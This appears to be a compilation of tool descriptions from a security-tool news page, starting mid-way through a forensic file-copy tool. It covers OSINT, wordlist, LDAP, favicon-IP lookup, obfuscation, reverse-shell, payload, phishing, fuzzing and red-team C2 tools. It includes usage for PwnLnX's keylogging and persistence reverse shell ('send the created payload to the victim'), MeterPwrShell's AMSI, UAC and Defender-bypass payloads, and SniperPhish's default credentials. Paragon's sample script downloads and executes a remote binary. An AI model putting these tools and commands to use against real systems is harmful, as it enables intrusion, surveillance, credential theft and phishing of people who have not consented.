Examples
TScopy_x64.exe -f c:\windows\system32\config\SYSTEM -o e:\outputdir  

Copies the SYSTEM registry to e:\outputdir. The new file will be located at e:\outputdir\windows\system32\config\SYSTEM

TScopy_x64.exe -f c:\windows\system32\config\SYSTEM -o e:\outputdir -i  

Copies the SYSTEM registry to e:\outputdir but ignores any previous cached files and does not save the current cache to disk

TScopy_x64.exe -f c:\windows\system32\config\SYSTEM,c:\windows\system32\config\SOFTWARE -o e:\outputdir  

Copies the SYSTEM and the SOFTWARE registries to e:\outputdir

TScopy_x64.exe -f c:\windows\system32\config\ -o e:\outputdir  

Copies the contents of the directory config to e:\outputdir

TScopy_x64.exe -r -f c:\windows\system32\config\ -o e:\outputdir  

Recursively copies the contents of the directory config to e:\outputdir

TScopy_x64.exe  -f c:\users\*\ntuser.dat -o e:\outputdir  

Copies each user's NTUSER.DAT file to e:\outputdir

TScopy_x64.exe  -f c:\users\*\ntuser.dat* -o e:\outputdir  

For each user, copies all files that begin with NTUSER.DAT to e:\outputdir

TScopy_x64.exe  -f c:\users\*\AppData\Roaming\Microsoft\Windows\Recent,c:\windows\system32\config,c:\users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -o e:\outputdir  

For each user, copies all jumplists, registry hives, and PowerShell history commands to e:\outputdir


Bug Reporting Information

Please report bugs in the issues section of the GitHub page.


Bug Fixes and Enhancements

Version 2.0
  • Issue 1: Change sys.exit to raise Exception
  • Issue 2: The double copying of files. Full name and short name.
  • Issue 3: Added the ability to recursively copy a directory
  • Issue 4: Add the support for wildcards in the path. Currently only supports *
  • Issue 5: Removed the hardcoded MFT size. MFT size determined by the Boot Sector
  • Issue 6: Converted the TScopy class into a singleton. This allows the class to be instantiated once and reuse the current MFT metadata object for all copies.
  • Issue 7: Attribute type ATTRIBUTE_LIST is now being handled.
  • Issue 9: Attribute type ATTRIBUTE_LIST was not handled for files. This caused a silent failure for files like the SOFTWARE registry hive.
  • Changes: General comments have been added to the code
  • Changes: Input parameters have changed. Reduced the three(3) different options --file, --list, and --directory to --file.
  • Changes: Backend restructuring to support new features.

TODO:
  1. Add support for Alternate Data Streams (ADS)
  2. Verify support for non-ascii path characters


Profil3r - OSINT Tool That Allows You To Find A Person'S Accounts And Emails + Breached Emails



Profil3r is an OSINT tool that allows you to find potential profiles of a person on social networks, as well as their email addresses. This program also alerts you to the presence of a data leak for the found emails.


Prerequisite

Python 3


Installation
git clone https://github.com/Rog3rSm1th/Profil3r.git
cd Profil3r/
python3 setup.py install

Features

Emails
  • Data leaks
  • Emails

Social
  • Instagram
  • Facebook
  • Twitter
  • Tiktok
  • Pinterest

Music
  • Soundcloud
  • Spotify

Programming
  • Github
  • Pastebin

Forum
  • 0x00sec.org
  • Jeuxvideo.com

Tchat
  • Skype

Entertainment
  • Dailymotion

Report

A report in JSON format is automatically generated in the reports folder


The config.json file

You can modify the report path and the services Profil3r will search in the config.json file

Field            Type    Default                           Description
report_elements  Array   ["email", "facebook", "twitter"]  List of the services for which profil3r will search
report_path      String  "./reports/{}.json"               The path of the report's JSON file; this path must include a {} which corresponds to the file name
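
A minimal config.json based on the defaults above (the real file may contain more fields):

{
  "report_elements": ["email", "facebook", "twitter"],
  "report_path": "./reports/{}.json"
}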

Example
python3 profil3r.py john doe

License

This project is under the MIT license.

Contact

For any remark, suggestion or job offer, you can contact me at r0g3r5@protonmail.com or on Twitter @Rog3rSm1th



Cook - A Customizable Wordlist And Password Generator



Easily create permutations and combinations of words with predefined sets of extensions, words and patterns/functions. You can use this tool to easily create complex endpoints and passwords, customizing it with your own secret keywords.
For easy usage, check out the Usage section.


Installation

Using Go
  go get github.com/giteshnxtlvl/cook

OR

  GO111MODULE=on go get github.com/giteshnxtlvl/cook

Update
  go get -u github.com/giteshnxtlvl/cook

Download latest builds

https://github.com/giteshnxtlvl/cook/releases/


Customizing tool

By customizing the tool you will be able to make and use your own lists and patterns/functions.

  1. Create an empty file named cook.yaml, or download cook.yaml
  2. Create an environment variable COOK pointing to the path of that file (see: how to set up an env variable; an example follows this list)
  3. Done. Run cook -config
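
For example, on Linux (the path is a placeholder):

export COOK=/path/to/cook.yaml
cook -config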

Basic Permutation


 

Recipe

  cook -start admin,root  -sep _,-  -end secret,critical  start:sep:end
  cook admin,root:_,-:secret,critical

Advance Permutation

Understanding the concept is important!



Predefined Sets



Recipe

 cook -start admin,root  -sep _ -end secret  start:sep:archive
 cook admin,root:_:archive

Create your own unique sets



Use it like CRUNCH



Patterns/Functions


 

Recipe

  cook -name elliot -birth date(17,Sep,1994) name:birth

Int Ranges



Files

Regex Input from File



Recipe

 cook -exp raft-large-extensions.txt:\.asp.*  /:admin:exp

Save Wordlists by Unique Names



File not found

If a file mentioned in a param is not found, there will be no errors; instead, the filename itself is treated as a plain word:

 cook -file file_not_exists.txt admin,root:_:file
  admin_file_not_exists.txt
  root_file_not_exists.txt

Cases



Using COOK with other tools

Direct fuzzing with GoBuster
 cook admin,root:_:archive | gobuster dir -u https://example.com/ -w -

Useful Resources

List                       Description
raft-large-extensions.txt  List of all extensions
all_tlds.txt               List of all TLDs

Todo
  • Endpoints Analyser
  • Interactive mode for configuring cook.yaml

All Sets
# Character set like crunch
charSet:
  sep : [_- ] #common separators
  n   : [0123456789]
  A   : [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
  a   : [abcdefghijklmnopqrstuvwxyz]
  aAn : [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
  An  : [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
  an  : [abcdefghijklmnopqrstuvwxyz0123456789]
  aA  : [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ]
  s   : ["!#$%&'()*+,-./:;<=>?@[\\]^_`{|}~&\""]
  all : ["!#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\""]

# Files to access from anywhere
files:
  raft_ext   : [E:\tools\wordlists\SecLists\Discovery\Web-Content\raft-large-extensions.txt]
  raft_dir   : [E:\tools\wordlists\SecLists\Discovery\Web-Content\raft-large-directories.txt]
  raft_files : [E:\tools\wordlists\SecLists\Discovery\Web-Content\raft-large-files.txt]
  robot_1000 : [E:\tools\wordlists\SecLists\Discovery\Web-Content\RobotsDisallowed-Top1000.txt]

# Create your lists
lists:
  schemas   : [aim, callto, cvs, data, facetime, feed, file, ftp, git, gopher, gtalk, h323, hdl, http, https, imap, irc, irc6, ircs, itms, javascript, magnet, mailto, mms, msnim, news, nntp, prospero, rsync, rtsp, rtspu, sftp, shttp, sip, sips, skype, smb, snews, ssh, svn, svn, svn+ssh, telnet, tel, wais, ymsg]
  bypass    : ["%00", "%09", "%0A", "%0D", "%0D%0A"]

  admin_set : [admin, root, su, superuser, administration]
  api       : [/v1/,/v2/,/v3/,/v4/,/v5/,/api/]
  pass_ends : [123, "@123", "#123"]

  months    : [January, February, March, April, May, June, July, August, September, October, November, December]
  mons      : [Jan, Feb, Mar, Apr, May, Jun, Jul, Aug, Sep, Oct, Nov, Dec]

# Patterns
patterns:
  date :
    - date(D,M,Y)
    - DMY
    - MDY
    - D/M/Y
    - M/D/Y
    - D-M-Y
    - M-D-Y
    - D.M.Y
    - M.D.Y
    - D.Y
    - M.Y
    - D.M

# Extension Set, . will be added before using this
extensions:
  config  : [conf, confq, config]
  data    : [xml, json, yaml, yml]
  backup  : [bak, backup, backup1, backup2]
  exec    : [exe, msi, bin, command, sh, bat, crx]
  web     : [html, html5, htm, js, jsx, jsp, wasm, php, php3, php5, php7]
  iis     : [asax, ascx, asmx, aspx, exe, aspx.cs, ashx, axd, config, htm, jar, js, rdl, swf, txt, xls, xml, xsl, zpd, suo, sln]
  archive : [7z, a, apk, xapk, ar, bz2, cab, cpio, deb, dmg, egg, gz, iso, jar, lha, mar, pea, rar, rpm, s7z, shar, tar, tbz2, tgz, tlz, war, whl, xpi, zip, zipx, xz, pak, tar.gz, gz]
  code    : [c, cc, class, clj, cpp, cs, cxx, el, go, h, java, lua, m, m4, php, php3, php5, php7, pl, po, py, rb, rs, sh, swift, vb, vcxproj, xcodeproj, xml, diff, patch, js, jsx]

  # Rest
  css_type : [css, less, scss]
  sheet    : [ods, xls, xlsx, csv, ics, vcf]
  slide    : [ppt, pptx, odp]
  font     : [eot, otf, ttf, woff, woff2]
  text     : [doc, docx, ebook, log, md, msg, odt, org, pages, pdf, rtf, rst, tex, txt, wpd, wps]
  audio    : [aac, aiff, ape, au, flac, gsm, it, m3u, m4a, mid, mod, mp3, mpa, pls, ra, s3m, sid, wav, wma, xm]
  book     : [mobi, epub, azw1, azw3, azw4, azw6, azw, cbr, cbz]
  video    : [3g2, 3gp, aaf, asf, avchd, avi, drc, flv, m2v, m4p, m4v, mkv, mng, mov, mp2, mp4, mpe, mpeg, mpg, mpv, mxf, nsv, ogg, ogv, ogm, qt, rm, rmvb, roq, srt, svi, vob, webm, wmv, yuv]
  image    : [3dm, 3ds, max, bmp, dds, gif, jpg, jpeg, png, psd, xcf, tga, thm, tif, tiff, yuv, ai, eps, ps, svg, dwg, dxf, gpx, kml, kmz, webp]



Ldsview - Offline search tool for LDAP directory dumps in LDIF format



Offline search tool for LDAP directory dumps in LDIF format.


Features
  • Fast and memory efficient parsing of LDIF files
  • Build ldapsearch commands to extract an LDIF from a directory
  • Show directory structure
  • UAC and directory time format translation

Config

Config options can be passed as CLI flags, environment variables, or via a config file, courtesy of viper. Reference the project's documentation for all of the different ways you can supply configuration.

  • By default, ldsview will look for a file called .ldsview.{json,toml,yaml} in the user's home directory
  • Environment variables with a prefix of LDSVIEW will be read in by the application

Usage

Detailed usage information is available via the --help flag or the help command for ldsview and all subcommands.


Search Syntax

ldsview's search mechanism is based on the entityfilter project. Detailed information about search filter syntax can be found in that project's README.


Examples
  • Build ldapsearch command to extract LDIF files from a directory: ldsview cmdbuilder
    • The command will prompt you for any information needed
    • Have the following ready:
      • Directory host FQDN or IP
      • Domain DN
      • User to run as
      • User's password
  • Quickly find a specific entity in an LDIF file: ldsview -f myfile.ldif entity myuser
  • Parse UAC flag from AD: ldsview uac 532480
  • Search LDIF file: ldsview -f myfile.ldif search "adminCount:=1,sAMAccountName:!=krbtgt"
    • This command will return all entities with an adminCount of 1 that are not krbtgt
    • -i can be used to limit which attributes are returned from matching entities
    • --tdc will translate directory timestamps into a human readable format

Tools Directory

Additional tools and utilities for managing LDIFs:

Makefile: Place the Makefile in the same directory as your exported LDIF and run make.

>> make -j9 LDIF=./my.domain.ldif

This will split and create the following default LDIFs:

  • users.ldif
  • computers.ldif
  • groups.ldif
  • domain_admin.ldif
  • poss_svc_accnts.ldif
  • pass_not_reqd.ldif
  • pass_cant_change.ldif
  • users_dont_expire.ldif
  • trusted_4_delegation.ldif
  • preauth_not_reqd.ldif
  • password_expired.ldif
  • trust2auth4delegation.ldif


Fav-Up - IP Lookup By Favicon Using Shodan



Looks up the real IP starting from the favicon icon, using Shodan.




Installation
  • pip3 install -r requirements.txt
  • Shodan API key (not the free one)

Usage

CLI

First define how you pass the API key:

  • -k or --key to pass the key via stdin
  • -kf or --key-file to pass the name of the file to read the key from
  • -sc or --shodan-cli to get the key from the Shodan CLI (if you have initialized it)

As of now, this tool can be used in the following ways:

  • -ff or --favicon-file: you store locally a favicon icon which you want to lookup
  • -fu or --favicon-url: you don't store locally the favicon icon, but you know the exact url where it resides
  • -w or --web: you don't know the URL of the favicon icon, but you still know that's there
  • -fh or --favicon-hash: you know the hash and want to search the entire internet.

You can specify input files which may contain URLs to domains, to favicon icons, or simply locations of locally stored icons:

  • -fl, --favicon-list: the file contains the full paths of all the icons you want to look up
  • -ul, --url-list: the file contains the full URLs of all the icons you want to look up
  • -wl, --web-list: the file contains all the domains you want to look up

You can also save the results to a CSV/JSON file:

  • -o, --output: specify the output and the format, e.g.: results.csv will save to a CSV file (the type is automatically recognized by the extension of the output file)

Examples

Favicon-file

python3 favUp.py --favicon-file favicon.ico -sc


Favicon-url

python3 favUp.py --favicon-url https://domain.behind.cloudflare/assets/favicon.ico -sc


Web

python3 favUp.py --web domain.behind.cloudflare -sc
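
Favicon-hash

If you already know the favicon hash, the lookup is similar (the hash value below is a placeholder):

python3 favUp.py --favicon-hash -2143045446 -sc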


Module
from favUp import FavUp

f = FavUp()
f.shodanCLI = True
f.web = "domain.behind.cloudflare"
f.show = True
f.run()

for result in f.faviconsList:
    print(f"Real-IP: {result['found_ips']}")
    print(f"Hash: {result['favhash']}")

All attributes
Variable            Type
FavUp.show          bool
FavUp.key           str
FavUp.keyFile       str
FavUp.shodanCLI     bool
FavUp.faviconFile   str
FavUp.faviconURL    str
FavUp.web           str
FavUp.shodan        Shodan class
FavUp.faviconsList  list[dict]

FavUp.faviconsList stores all the results; the key fields depend on the type of lookup you want to do.

In case of --favicon-file or --favicon-list:

  • favhash stores the hash of the favicon icon
  • file stores the path

In case of --favicon-url or --url-list:

  • favhash stores the hash of the favicon icon
  • url stores the URL of the favicon icon
  • domain stores the domain name
  • maskIP stores the "fake" IP (e.g. the Cloudflare one)
  • maskISP stores the ISP name associated with the maskIP

In case of --web or --web-list:

  • favhash stores the hash of the favicon icon
  • domain stores the domain name
  • maskIP stores the "fake" IP (e.g. the Cloudflare one)
  • maskISP stores the ISP name associated with the maskIP

(in this case the URL of the favicon icon is returned by the href attribute of <link rel='icon'> HTML element)

If, while searching for the favicon icon, nothing useful is found, not-found will be returned.

In all three cases, found_ips field is added for every checked entry. If no IP(s) have been found, not-found will be returned.


Compatibility

At least python3.6 is required due to spicy syntax.


Feedback/Suggestion

Feel free to open any issue, your feedback and suggestions are always welcome <3


Publications

Unveiling IPs behind Cloudflare by @noneprivacy


Disclaimer

This tool is for educational purposes only. The authors and contributors don't take any responsibility for the misuse of this tool. Use It At Your Own Risk!


Credits

Conceived by Francesco Poldi noneprivacy, built with Aan Wahyu Petruknisme.

stanley_HAL told me how Shodan calculates the favicon hash.

What is Murmur3?

More about Murmur3 and Shodan



Invoke-Stealth - Simple And Powerful PowerShell Script Obfuscator



Invoke-Stealth is a Simple & Powerful PowerShell Script Obfuscator.

This tool helps you to automate the obfuscation process of any script written in PowerShell with different techniques. You can use any of them separately, together or all of them sequentially with ease, from Windows or Linux.


Requirements
  • Powershell 4.0 or higher
  • Bash*
  • Python 3*

*Required to use all features


Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/Invoke-Stealth.git

You can also download the limited version as follows:

powershell iwr -useb https://darkbyte.net/invoke-stealth.php -outfile Invoke-Stealth.ps1

Usage
.\Invoke-Stealth.ps1 -help

Info: This tool helps you to automate the obfuscation process of
any script written in PowerShell with different techniques

Usage: .\Invoke-Stealth.ps1 script.ps1 -technique Xencrypt
- You can use as single or separated by commas -

Techniques:
· Chimera: Substitute strings and concatenate variables
· Xencrypt: Compresses and encrypts with random iterations
· PyFuscation: Obfuscate functions, variables and parameters
· PSObfuscation: Convert content to bytes and encode with Gzip
· ReverseB64: Encode with base64 and reverse it to avoid detections
· All: Sequentially executes all techniques described above

Warning: The output script will exponentially multiply the original size
Chimera & PyFuscation need dependencies to work properly in Windows
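
As the help text notes, techniques can be passed singly or comma-separated; for example, to chain three of them in one run (the script name is illustrative):

.\Invoke-Stealth.ps1 .\payload.ps1 -technique Chimera,Xencrypt,ReverseB64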

The detailed guide of use can be found at the following link:

https://darkbyte.net/ofuscando-scripts-de-powershell-con-invoke-stealth


License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.


Credits and Acknowledgments

This script has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec

Some modules use third-party code, scripts, and tools, particularly:

Chimera by tokyoneon --> https://github.com/tokyoneon/Chimera

BetterXencrypt by GetRektBoy724 --> https://github.com/GetRektBoy724/BetterXencrypt

PyFuscation by CBHue --> https://github.com/CBHue/PyFuscation

PSObfuscation by gh0x0st --> https://github.com/gh0x0st/Invoke-PSObfuscation


Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can contact through info@darkbyte.net


PwnLnX - An Advanced Multi-Threaded, Multi-Client Python Reverse Shell For Hacking Linux Systems



An advanced multi-threaded, multi-client Python reverse shell for hacking Linux systems. There's still more work to do, so feel free to help out with the development. Disclaimer: this reverse shell should only be used for the lawful, remote administration of authorized systems. Accessing a computer network without authorization or permission is illegal.


Getting Started

Please follow these instructions to get a copy of PwnLnX running on your local machine without any problems.


Prerequisites
  • Python3:
    • vidstream
    • pyfiglet
    • tqdm
    • mss
    • termcolor
    • pyautogui
    • pyinstaller
    • pip3
    • pynput

Installing
# Download source code
git clone https://github.com/spectertraww/PwnLnX.git


cd PwnLnX

# download and install the dependencies
chmod +x setup.sh

./setup.sh

Getting PwnLnX up and running

Show help

python3 PwnLnX.py --help


Listening for incoming connections

python3 PwnLnX.py --lhost [your localhost ip address] --lport [free port for listening incoming connections]
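
For example, with illustrative values for a lab setup:

python3 PwnLnX.py --lhost 192.168.1.10 --lport 4444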


Creating/generating a payload
chmod +x PwnGen.sh

./PwnGen.sh

Then follow the procedure to successfully create your payload; it will be saved in the PwnLnX directory. Send the created payload to the victim.


PwnLnx Usage
Command          Usage
help             show help
exit             close all the sessions and quit the program
show sessions    show all available sessions from connected targets
session [ID]     interact with a specified session ID
kill [all/ID]    kill a specified session, or all to kill all sessions
banner           have fun by changing the program banner

Interact with a session
Command              Usage
help                 show help
quit                 close the current session
background           background the current session
sysinfo              get minimum target system information
create_persist       create a persistent backdoor
upload               upload the specified file to the target system
download             download the specified file from the target system
screenshot           take a desktop screenshot of the target system
start_screenshare    start desktop screensharing
stop_screenshare     stop desktop screensharing
start_keycap         start capturing the victim's pressed keystrokes
dump_keycap          dump/get the captured keystrokes
stop_keycap          stop capturing keystrokes

NB: you can also execute Linux system commands besides those listed above.


Disclaimer

I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.


Report Bugs

spectertraww@gmail.com


Snapshots












M365_Groups_Enum - Enumerate Microsoft 365 Groups In A Tenant With Their Metadata



The all_groups.py script enumerates all Microsoft 365 Groups in an Azure AD tenant with their metadata:

  • name
  • visibility: public or private
  • description
  • email address
  • owners
  • members
  • Teams enabled?
  • SharePoint URL (e.g. for Teams shared files)

All of this, even for private Groups! Read more about this in my blog article "Risks of Microsoft Teams and Microsoft 365 Groups"

The reporting.py script takes the JSON output from all_groups.py and generates a CSV file, allowing you to quickly identify sensitive private or public groups.


Installation

Requirement:

  1. Download the repository
  2. Install requirements with
pip install -r requirements.txt

Usage

You will need a valid account on the tenant. Different authentication methods are supported:

  • via login + password (MFA not supported)
python all_groups.py -u myuser@example.onmicrosoft.com -p MyPassw0rd
  • via device authentication, which supports MFA via the browser. Launch it, then follow the instructions
python all_groups.py --device-code

Other methods are also offered. You can read the ROADTools documentation or run the script without any argument to get help.

python all_groups.py

That's all, you don't need more options! The script output will be in all_groups.json in the current directory.

Then, if you want a nicer and more concise output from this JSON, use reporting.py to transform it:

python reporting.py

It automatically takes all_groups.json in the current directory, and outputs to all_groups.csv in the same directory.
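
If you prefer to slice the raw JSON yourself, a minimal sketch is below; the "visibility" and "name" key names are assumptions and may differ in the actual all_groups.json output:

import json

# List groups marked as public. The key names used here are
# assumptions; adjust them to match your all_groups.json.
with open("all_groups.json") as fh:
    groups = json.load(fh)

for group in groups:
    if str(group.get("visibility", "")).lower() == "public":
        print(group.get("name", "<unnamed>"))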


Acknowledgements

This project uses for authentication the very helpful roadlib from ROADTools by @dirkjanm



MeterPwrShell - Automated Tool That Generate The Perfect Powershell Payload



An automated tool that generates a PowerShell one-liner that can create a Meterpreter shell on Metasploit, bypass AMSI, bypass the firewall, bypass UAC, and bypass AVs.

This tool is powered by Metasploit-Framework and amsi.fail


Notes
  • NEVER UPLOAD THE PAYLOAD GENERATED BY THIS PROGRAM TO ANY ONLINE SCANNER
  • NEVER USE THIS PROGRAM FOR MALICIOUS PURPOSES
  • SPREADING THE PAYLOAD GENERATED BY THIS PROGRAM IS NOT COOL
  • ANY DAMAGE CAUSED BY THIS PROGRAM IS NOT MY (as the program maker) RESPONSIBILITY!!!
  • If you have a feature recommendation, post it as an Issue
  • If you have an issue with the program, try redownloading it (trust me), because sometimes I edit the release and fix things without telling
  • If you want to know how my payload bypasses AVs, you can check this and this
  • Don't even try to fork this repository, you won't get the releases!

Features (v1.5.1)
  • Bypass UAC
  • Automatic Migrate (using PrependMigrate)
  • Built-in GetSYSTEM (if you use the Bypass UAC option)
  • Disable All Firewall Profiles (if you use the Bypass UAC option)
  • Fully Bypass Windows Defender Real-time Protection (if you choose the shortened payload, use Bypass UAC, or both)
  • Disable Windows Defender Security Features (if you use the Bypass UAC option)
  • Fully unkillable payload
  • Bypasses AMSI Successfully (if you choose the shortened payload)
  • Short One-Liner (if you choose the shortened payload)
  • Bypass Firewall (if you pick an unstaged payload)
  • Great CLI
  • A Lot More (Try it by yourself)

All payload features are tested on Windows 10 v20H2

Advantages Of MeterPwrShell Compared To The web_delivery Module From Metasploit Framework
  • Shorter stager (Or short one-liner in this case)
  • Various AMSI bypass technique and code
  • No need to set up a server for the stager
  • Built-in Ngrok support (so the victim doesn't need to be on the same local network)
  • Automatic Built-in Privesc
  • Easily Bypass Windows Defender

Thanks to
  • Every single one of my Discord friends
  • Special Thx to theia#8536 on Discord
  • @FuzzySec for that awesome Masquerade PEB script
  • @decoder-it for that amazing PPID Spoofing script
  • Me for not dying when creating this tool
  • Ed Wilson AKA Microsoft Scripting Guy for the great Powershell scripting tutorials
  • and the last one is Emeric Nasi for the research on bypassing AV dynamics

Requirements
  • Kali Linux, Ubuntu, or Debian (if you don't use one of those, the tool will not work!)
  • Metasploit Framework
  • Internet Connection (Both On Victim And Attacker Computer)

Installation
apt update && apt install wget
mkdir MeterPwrShell
cd MeterPwrShell && wget https://github.com/GetRektBoy724/MeterPwrShell/releases/download/v1.5.1/meterpwrshellexec
chmod +x meterpwrshellexec

Usage
# ./meterpwrshellexec -c help
Available arguments : help, version, showbanner, showlastdebuglog, disablerootdetector, disableinternetdetector, disablealldetector
help : Show this page
version : Show MeterPwrShell's version
showbanner : Show MeterPwrShell's Banner
showlastdebuglog : Well,Its kinda self-explanatory tho
disablerootdetector : Well,Its kinda self-explanatory tho
disableinternetdetector : Well,Its kinda self-explanatory tho
disablealldetector : Disable all detector except Linux distribution detector
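
For example, to skip every environment check except the Linux distribution check (per the arguments listed above):

./meterpwrshellexec -c disablealldetector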

You can also use MeterPwrShell without any flags or arguments


Attack Vectors
  • BadUSBs
  • Malicious Shortcuts (lnk2pwn)
  • Document Macro Payload
  • MS DDE Exploit
  • Extreme way: type it in yourself
  • Any exploit/vuln that lets you execute commands on the victim
  • Idk, I have run out of ideas lmao

To-do List

Available feature options
  • Bypass AMSI
  • Shortened Payload AKA IEX WebClient method (If you use Bypass AMSI Feature)
  • Bypass UAC (If you use Shortened Payload AKA IEX WebClient method)


SniperPhish - The Web-Email Spear Phishing Toolkit



SniperPhish is a phishing toolkit for pentesters and security professionals to enhance user awareness by simulating real-world phishing attacks. SniperPhish helps combine the phishing emails and phishing websites you create to centrally track user actions. The tool is designed for performing professional phishing exercises; remember to obtain prior permission from the targeted organization to avoid legal implications.


Installation
  1. Download the source code and put it in your web root folder
  2. Open http://localhost/install in your browser and follow the steps for installation
  3. After installation, open http://localhost/spear to login

Default login - Username: admin Password: sniperphish


Main Features
  • Web tracker code generation - track your website visits and form submissions independently
  • Create and schedule Phishing mail campaigns
  • Combine your phishing site with email campaign for centrally tracking
  • An independent "Simple Tracker" module for quickly tracking an email or web page visit
  • Advanced report generation - generate reports based on the tracking data you need
  • Custom tracker images and dynamic QR codes in messages
  • Track phishing message replies

Screenshots




Creating Web-Email Campaign

Create a web tracker -> add the web tracker to the phishing website -> create a mail campaign with a link pointing to the phishing website -> start the mail campaign.


Creating a web tracker:
  1. Design your website in your favorite programming language. Make sure you provide unique "id" and "name" values for HTML fields such as text fields, checkboxes, etc.
  2. Generate the web-tracker code under Web Tracker -> New Tracker. The "Web Pages" tab lists the pages you want to track.
    • To track form submission data, provide the "id" or "name" values of the HTML fields present in your phishing site form.
    • Repeat the above for each page in your phishing site.
  3. From the final output, copy the generated JavaScript link and add it to each page of your phishing website.
  4. Finally, save the tracker. It is now activated and listening in the background; opening your phishing site or submitting data is tracked.

Creating an Email campaign:
  1. Go to Email Campaign -> User Group and add target users
  2. Go to Email Campaign -> Sender List and configure Mail server details
  3. Go to Email Campaign -> Email Template and create a mail template. When you add your phishing website link, make sure to append ?cid={{CID}} at the end; this is to distinguish each user. For example, http://yourphishingsite.com/login?cid={{CID}}
  4. Now go to Email Campaign -> Campaign List -> New Mail Campaign and select/fill the fields to create campaign.
  5. Start Mail campaign

Viewing combined Web-Email Result

Open Web-MailCamp Dashboard -> Select Campaign, and select the Mail Campaign and Web Tracker you created.



More

SniperPhish honors contributions of

Joseph Nygil (@j_nygil) and Sreehari Haridas (@sr33h4ri)



Vaf - Very Advanced (Web) Fuzzer



very advanced fuzzer


compiling
  1. Install nim from nim-lang.org
  2. Run
nimble build

A vaf.exe file will be created in your directory, ready to be used


using vaf

Using vaf is simple; here's the current help text:

Usage:
vaf - very advanced fuzzer [options]

Options:
-h, --help
-u, --url=URL choose url, replace area to fuzz with []
-w, --wordlist=WORDLIST choose the wordlist to use
-sc, --status=STATUS set on which status to print, set this param to 'any' to print on any status (default: 200)
-pr, --prefix=PREFIX prefix, e.g. set this to / for content discovery if your url doesn't have a / at the end (default: )
-sf, --suffix=SUFFIX suffix, e.g. use this for extensions if you are doing content discovery (default: )
-pd, --postdata=POSTDATA only used if '-m post' is set (default: {})
-m, --method=METHOD http method to use, e.g. get or post (default: get)
-pif, --printifreflexive print only if the output is reflected in the page, useful for finding xss
-ue, --urlencode url encode the payloads
-pu, --printurl prints the url that has been requested

screenshots



(with every status code printed, suffixes .php,.html and no prefixes)



(with url printed, every status code printed, suffixes .php,.html and no prefixes)



(post data fuzzing)


examples

Fuzz post data:

vaf.exe -w example_wordlists\short.txt -u https://jsonplaceholder.typicode.com/posts -m post -sc 201 -pd "{\"title\": \"[]\"}"

Fuzz GET URLs

vaf.exe -w example_wordlists\short.txt -u https://example.org/[] -sf .html

tips
  • Add a trailing , in the suffixes or prefixes argument to also try the word without any suffix/prefix, like this: -pr .php, or -sf .php,
  • Use -pif with a bunch of XSS payloads as the wordlist to find XSS (see the example after this list)
  • Make an issue if you want to suggest a feature
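
A minimal reflected-XSS hunt based on the -pif tip above (the wordlist name is illustrative):

vaf.exe -w xss_payloads.txt -u "https://example.org/search?q=[]" -pif -sc any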


Paragon - Red Team Engagement Platform With The Goal Of Unifying Offensive Tools Behind A Simple UI


Paragon is a Red Team engagement platform. It aims to unify offensive tools behind a simple UI, abstracting much of the backend work to enable operators to focus on writing implants and spend less time worrying about databases and CSS. The repository also provides some offensive tools already integrated with Paragon that can be used during engagements.

This repository is still under heavy development and is not ready for production use. When it is considered stable, a V1.0.0 tag will be released. Until then, the API may encounter breaking changes as we continually simplify our design. Please read the developer documentation below if you'd like to help us reach this milestone faster.


Feature Highlights
  • Easily integrate custom tools to unify operations behind a single interface
  • Query the Red Team knowledge graph using a provided GraphQL API
  • Event emission for low latency automation and real time processing
  • Python-like scripting language for deployments, post-exploitation, and more
  • Cross-platform implants & deployment included
  • Record operator activity to conveniently aggregate into a post-engagement report for review

Getting Started

A quick demonstration instance can be set up by cloning the repository and running docker-compose up. Open 127.0.0.1:80 in your browser to get started!

The utilized images are available on docker-hub, and can be configured from a docker-compose file for a production deployment.


Component Overview

Scripting Language

Most components in this repository rely on a Python-like scripting language which enables powerful control and customization of their behaviour. The language is a modified version of Google's starlark, extended with cross-platform functionality for operators. This also enables tools like the agent and dropper (discussed below) to execute tasks without relying on system binaries (curl, bash, etc). All operations are executed as code in Golang, so it's intuitive to add additional functionality to the scripting environment. Here is an example script:

# Download a file via https, execute it, and don't keep it as a child process.
load("sys", "request")

new_bin = "/tmp/kqwncWECaaV"
request("https://library.redteam.tld", writeToFile=new_bin)

# set new_bin permissions to 0755
chmod(new_bin, ownerRead=True, ownerWrite=True, ownerExec=True, groupRead=True, groupExec=True, worldRead=True, worldExec=True)
exec(new_bin, disown=True)

Reference


Teamserver

Provides a simple web application and GraphQL API to interface with a Red Team knowledge graph, unifying tools behind a centralized source of truth and abstracting many tedious backend concerns from operators. Integrate your custom tools with the Teamserver (using the GraphQL API or event subscriptions) to save time on the backend work. The Teamserver records all activity, so with all of your tools unified in one place, writing post-engagement reports becomes significantly easier.


Built-In Tools

The below tools are also included within the repository. They can easily be extended to fit many cross-platform use cases.


Dropper
  • Fully cross-platform
  • Statically compile assets into a single binary
  • Provides Python-like scripting language for custom deployment configuration

Paragon provides a tool for packaging assets (binaries, scripts, etc.) into a single binary that, when executed, runs your custom deployment script, which may write assets to the filesystem, launch processes, download files, handle errors, and more. It is fully cross-platform and statically compiled, providing reliable deployments. If you wish to extend its functionality, you can simply extend the generated Golang file before compiling.


Agent
  • Fully cross-platform
  • Provides Python-like scripting language for post exploitation
  • Modular communication mechanisms, only compile in what you need
    • Utilize multiple options to ensure reliable callbacks
  • Customize how the agent handles communication failures

An implant that executes tasks and reports execution results. It is configured by default to execute tasks using Paragon's Python-like scripting language and to communicate with a C2 via http(s). It is written in Go, and can be quickly modified to add new transport methods (i.e. DNS), execution options, fail over logic, and more.


C2
  • Lightweight deployment
  • Highly performant, able to handle thousands of Agents
    • Dependent on system resources and available bandwidth
  • Distributed service, utilize as many C2s as you'd like

